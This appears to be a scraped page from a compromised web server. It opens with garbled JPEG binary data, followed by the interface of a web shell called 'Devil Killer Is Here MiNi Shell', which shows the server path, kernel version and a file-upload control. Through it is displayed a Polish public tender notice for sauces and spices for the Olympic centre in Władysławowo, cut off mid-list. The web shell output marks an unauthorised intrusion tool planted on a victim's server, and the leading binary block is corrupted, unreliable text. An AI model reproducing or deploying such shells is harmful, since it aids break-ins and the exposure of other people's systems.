JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211214/0031500601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywne dostawy przypraw, sosów i dresingów wraz z usługą transportu do Ośrodka Przygotowań Olimpijskich we Władysławowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centralny Ośrodek Sportu z siedzibą w Warszawie, (00-449), ul. Łazienkowska 6A, Ośrodek Przygotowań Olimpijskich we Władysławowie (84-120) ul. Żeromskiego 52</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 14273335600035</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żeromskiego 52</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Władysławowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-120</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi.wladyslawowo@cos.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.cos.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - instytucja gospodarki budżetowej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> sport </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywne dostawy przypraw, sosów i dresingów wraz z usługą transportu do Ośrodka Przygotowań Olimpijskich we Władysławowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-84adf5bb-5ce2-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00315006</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00019786/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.10 Dostawy sosów, półproduktów</p> <p class="mb-0">1.2.11 Dostawy przypraw,sosów,dresingów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal (adres skrzynki ePUAP Zamawiającego /COS-IGB/SkrytkaESP - podmiot: Centralny Ośrodek Sportu Warszawa ) oraz poczty elektronicznej (poczta elektroniczna nie służy do przesyłania oferty)<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzy¬stania z miniPortalu dostępnym pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi.aspx oraz Regulaminie ePUAP.<br/>4. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać po¬stanowień tego regulaminu.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i wycofania oferty oraz do komunikacji wynosi 150 MB.<br/>6. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na ePUAP.<br/>7. W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta Wykonawcy i załączniki do oferty) odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji). Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP). W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem.<br/>8. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: przetargi.wladyslawowo@cos.pl<br/>9. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres email Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. z 2020r. poz. 2415)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/> administratorem Pani/Pana danych osobowych jest Centralny Ośrodek Sportu, ul. Łazienkowska 6a, 00-449 Warszawa.<br/> Dane kontaktowe do Inspektora Ochrony Danych: iod@cos.pl, tel. 513790306 ;<br/> Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na ”Sukcesywne dostawy przypraw, sosów i dresingów do Ośrodka Przygotowań Olimpijskich we Władysławowie wraz z usługą transportu” odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz.U. z 2021 r. poz. 1129 z późn. zm.), dalej „ustawa Pzp”;<br/> Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/> obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/> w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/> posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal"> nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">18/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Cześć I: Rosoły, zupy, sosy, dresingi, tłuszcze, dodaki do dań, desery <br/>1	Sos podstawowy baza tak zwany Demi-Glace - bez dodatku glutaminianu sodu, bez konserwantow i sztucznych barwników, dobrze rozpuszcza się w gorącej wodzie, zachowuje swoją jakość (nie rozwarstwia się) podczas bemarowania. Opakowanie eurokontener maksimum a&#39; 1 kg o wydajności minimum 20 litrów z 1 kg - typu Knor lub produkt równoważny ...............................................................*/ kg	12<br/>2	SOS PIECZENIOWY -( w paście), intensywny, mięsy smak pieczeni, dobrze rozpuszcza się w gorącej wodzie, zachowuje swoją jakość (nie rozwarstwia się) podczas bemarowania. bez dodatku glutaminianu sodu i sztucznych barwników opakowanie eurokontener maksimum a&#39;2 kg o wydajności minimum 7 litrów z 1 kg, typu Knor lub produkt równoważny........................................................................* /	kg	12<br/>3	Sos typu – CAFE de PARIS - aromatyczny ziołowy sos o unikalnej recepturze, dobrze rozpuszcza się w gorącej wodzie, zachowuje swoją jakość, kremową konsystencję (nie rozwarstwia się) podczas bemarowania. opakowanie eurokontener maksimum a&#39; 1 kg o wydajności minimum 5 litrów z 1 kg, nie zawiera glutaminianu, sztucznych barwników i konserwantów typu Knor lub produkt równoważny- ..........................................................................*/	kg	16<br/>4	sos Chili słodko-pikantny -dodatek do ryb,drobiu,aromatyczny,pikantny opakowanie max 1 kg typu Tao-Tao lub produkt rownoważny….........................................................	kg	40<br/>5	Baza do sosu typu - FIX DO POTRAW CHIŃKICH - dobrze rozpuszcza się w gorącej wodzie, zawiera kompozycję warzyw i przypraw charakterystycznych dla potraw z dalekiego wschodu. opakowanie eurokontener maksimum a&#39; 1 kg o wydajności minimum 11,0 litrów z 1 kg typu Knor lub produkt równoważny.................................................................*/	kg	20<br/>6	GRZANKI ZIOŁOWO-CZOSNKOWE-skład:kostki chleba pszennego 64,2%/mąka pszenna/olej rzepakowy,sól.drożdze,tłuszcz palmowy,aromaty/czosnkowy 4,5%,ziołowy-2%/w tym seler/przeciwutleniacz/wyciągi z rozmarynu/- opakowanie karton lub folia max 1 kg typu Knor lub produkt rownoważny…………………………………..	kg	80<br/>7	GROSZEK PTYSIOWY- skład;mąka pszenna,tłuszcz palmowy.sół,jaja kurze w proszku,mleko w proszku odtłuszczone,drożdże,bez suropu glukozowo-fruktozowego-,opakowanie karton lub folia max 1 kg ,typu Knor lub produkt rownoważny…………………………………………....*/	kg	36<br/>8	Cebula smażona - cebulka opakowanie PET max 1000 g………………………………………*	kg	80<br/>9	SOS SAŁATKOWY typu KOPERKOWY w proszku – stosowany dodatek do sosów na bazie oliwy lub majonezu, o charakterystycznym koperkowym smaku. opakowanie eurokontener maksimum a&#39; 1 kg o wydajności minimum 12 litrów z 1 kg ,typu Knor lub produkt rownoważny ..........................................................................*/	kg	6,5<br/>10	Pulpa pomidorowa typu - TOMATO PRONTO – gęsta o intensywnej czerwonej barwie, z najlepszych jakościowo odmian czerwonych pomidorów. opakowanie puszka maksimum a&#39; 2,00 kg typu Knorr lub produkt równoważny............................................................................* /	kg	180<br/>11	KONCENTRAT POMIDOROWY 30% - Produkowany z pomidorów pierwszej jakości, nie zawiera skórek i nasion. Zawiera 30% pomidorów w suchej masie. opakowanie puszka maksimum a&#39; 1kg typu złoty Bażant,Pudliszki,Łowicz , lub produkt rownoważny............................................................................*/ kg	255<br/>12	Pomidory bez skórki - krojone lub w całości, opakowanie puszka max 3 kg netto-należy podać cenę netto za surowiec bez zalewy typu Dawtona ,Pudliszki,Łowicz lub produkt równoważny…………………………………..	kg	500<br/>13	Pasta o aromatycznej kompozycji przypraw połączonych z tłuszczem i solą typu - PRIMERBA BAZYLIOWA – skład: olej roślinny bazylia (min 36%) substancje wzmacniające smak i zapach. Bez konserwantów i sztucznych barwników opakowanie słoiczek maksimum a&#39; 0,5 kg tupu Knor lub produkt równoważny...............................................................* / kg	6,8<br/>14	Pasta o aromatycznej kompozycji przypraw połączonych z tłuszczem i solą typu - PRIMERBA CZERWONE PESTO – skład: olej roślinny, koncentrat pomidorowy (min 12%), bazylia (min 10%), sól, substancja wzmacniająca smak i zapach. Bez konserwantów i sztucznych barwników. opakowanie słoiczek maksimum a&#39; 0,5 g typu Knor lub produkt równoważny........................................................................*/ kg	7<br/>15	Pasta o aromatycznej kompozycji przypraw połączonych z tłuszczem i solą typu - PRIMERBA GRZYBOWA - skład: olej roślinny, pieczarki (min 22%), sól, tłuszcz roślinny utwardzony, substancja wzmacniająca smak i zapach. Bez konserwantów i sztucznych barwników. opakowanie słoiczek maksimum a&#39; 0,5 kg typu Knor Lub produkt rownoważny............................................................* / kg	7<br/>16	Pasta o aromatycznej kompozycji przypraw połączonych z tłuszczem i solą typu - PRIMERBA PESTO - olej roślinny, bazylia (min 22%), oliwa z oliwek, orzeszki pinii (min 8%), sól, substanacja wzmacniajaca smak i zapach Bez konserwantów i sztucznych barwników. opakowanie słoiczek maksimum a&#39; 0,5 kg typu Knor lub produkt równoważny..........................................................................*/ kg	4<br/>17	Pasta o aromatycznej kompozycji przypraw połączonych z tłuszczem i solą typu PRIMERBA PROWANSALSKA - tłuszcz roślinny, zioła i przyprawy min 38% sól, substanacja wzmacniająca smak i zapach: glutaminian sodu; czosnek (min 8%), tymianek, bazylia, rozmaryn, opakowanie słoiczek maksimum a&#39; 0,5 kg typu Knor lub produkt rownoważny........................................*/ kg	3<br/>18	Pasta o aromatycznej kompozycji przypraw połączonych z tłuszczem i solą typu PRIMERBA TYMIANKOWA - tłuszcz roślinny, zioła i przyprawy min 38% sól, substanacja wzmacniająca smak i zapach: glutaminian sodu; czosnek (min 8%), tymianek, bazylia, rozmaryn, opakowanie słoiczek maksimum a&#39; 0,5 kg typu Knor lub produkt rownoważny........................................*/ kg	3<br/>19	Pasta szafranowa , bez konserwantów, nadaje kolor i smak szafranu opakowanie maksimum 1 kg .typu Knor lub produkt rownoważny.......................................*/	kg	1<br/>20	Sos typu BARBECUE- sos o aromacie wędzonych śliwek i dymu z ogniska opakowanie max 1 kg -termin przydatności co najmniej 3 miesiące od daty dostawy,typu Dawtona lub produkt rownoważny………………………………………………*/	kg	70<br/>21	Sos typu - HOLENDERSKI - dobrze rozpuszcza się w zimnej wodzie, jasno zółty sos o wyrazistym maślano-winnym smaku, zachowuje swoją jakość (nie rozwarstwia się) podczas bemarowania. bez dodatku glutaminianu sodu, bez konserwantow i sztucznych barwników, opakowanie eurokontener max 1 kg o wydajności min 6l z 1 kg typu Knor lub produkt rownoważny............................................................................*/ kg	20<br/>22	Śmietana roślinna typu - Rama Cremefine Profi 31% – połączenie maślanki i tłuszczów roślinnych zawartość tłuszczu min 31%, 2,5 krotny przyrost obietości po ubiciu. Stabilna nawet 2 godziny po ubiciu. Nie żółknie zachowuje śnieżnobiały kolor. Nadaje się do zapiekania. opakowanie max 1l …………………………………………………*/	litr	8<br/>23	Kapary w zalewie - Opakowanie puszka lub słoik o wadze max 1 kg . Cenę należy podać w odniesieniu do wagi wsadu surowca netto (bez zalewy)/kg ,typu Helcom lub produkt równoważny………………………………………*/	kg	5<br/>24	Zakwas do żurku-koncentrat-wydajność min.4 l żurku z 1 l koncentratu,składniki -naturalny zakwas żytni,przeciery warzywne/z cebuli,ziemniaków/,tłuszcz wieprzowy,serwatka,mąka-żytnia,pszenna,laktoza,białko mleka,odłuszczone mleko w proszku,ekstart grzybowymajeranej,, - butelka lub kartonik o pojemnośći max 1,0 litr typu Krakus,lub produkt równoważny…………………………………………………*/	litr	170<br/>25	AUSZPIK – naturalny bez konserwantów, sztucznych barwników i ulepszaczy smakowych, bez glutaminianu sodu. Dobrze rozpuszczalny w wodzie. opakowanie eurokontener maksimum a&#39; 1 kg typu Knor lub produkt rownowazny...........................................................................*/	kg	10<br/>26	Sos Worcestershire-fermentowany sos kulinarny o korzennym smaku i płynnej konsystencji.składniki-m.innymi -ocet słodowy,ocet,melasa,cukier,szalotka,przyprawy,aromaty,ekstrat z tamaryndowca,Doskonały do mięs,sosów,warzyw,makaronów.Opakowanie butelka max 1 litr....................................................	litr	5<br/>27	Sos sojowy typu kikkoman-skład-woda,ziarno soi,pszenica,sól,słony,intensywny z nutką słodyczy smak - Opakowanie max 1 litr …………………………………………………*/ litr	10<br/>28	Sos sojowy ciemny - do zup, marynat i sosów. Opakowanie max1000ml. litr	10<br/>29	Pikantny sos z chili z pomidorami typu KNOR-opak max 1 litr,skład:woda,cukier,papryka chili/co najmniej 6%/,koncentrat pomidorowy suszony/ nie mniej niż 4%/,cebula,sól.imbir,szczypiorek,olej palmowy,ekstrakt przyprawowy,substancje zagęszczające i konserwujące.lub produkt równoważny........................................................	litr	10 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15871260-4 - Sosy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15891000-0 - Zupy i buliony</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II: Przyprawy jednolite i mieszane <br/>1	Przyprawa typu - MARYNATA PREMIUM - do drobiu; gruboziarnista, z solą morską, mieszanka czerwonej papryki, czosnku, marchwi, rozmarynu, oliwy z oliwek, pieprzu cayenne, nasion kolendry, kozieradki, liści pietruszki, kurkumy i gorczycy, bez sztucznych barwników, bez glutaminianu, bez konserwantów. opakowanie PET maksimum a&#39; 1 kg typu Knor lub produkt rownoważny............................................................................*/ kg	40<br/>2	Przyrawa typu - MARYNATA PREMIUM-do ryb i owoców 